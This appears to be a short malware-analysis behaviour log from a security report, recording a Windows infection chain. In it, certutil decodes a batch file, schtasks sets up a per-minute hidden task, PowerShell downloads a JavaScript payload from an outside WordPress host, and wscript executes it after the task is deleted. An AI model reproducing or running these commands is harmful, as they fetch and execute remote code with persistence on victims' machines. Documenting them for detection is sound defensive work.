Technical Information
- <SYSTEM32>\tasks\mhgnyk8flz
- '<SYSTEM32>\certutil.exe' -f -decode vaIA0Oxz.bat vaIA0Oxz.bat
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 1 /tn MHgnYK8fLZ /tr "%TEMP%\vaIA0Oxz.bat"
- %TEMP%\vaia0oxz.bat
- <SYSTEM32>\tasks\mhgnyk8flz
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\vaIA0Oxz.bat" (with hidden window)
- '<SYSTEM32>\taskeng.exe' {BBF07C28-BEF3-4098-9A0A-B90E24EDCF12} S-1-5-21-3150914307-1777937420-491476919-1000:vcxnpicf\user:Interactive:[1]
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\vaIA0Oxz.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "IWR -UseBasicParsing 'https://entertainment-in-tenerife.com/wp-content/uploads/reader.php' -OutFile '%TEMP%\y9e0jr5h.js'; schtasks /delete /f /tn MHgnYK8fLZ; wscript %TEMP%\y9e0jr5h.j...
- '<SYSTEM32>\schtasks.exe' /delete /f /tn MHgnYK8fLZ
- '<SYSTEM32>\wscript.exe' %TEMP%\y9e0jr5h.js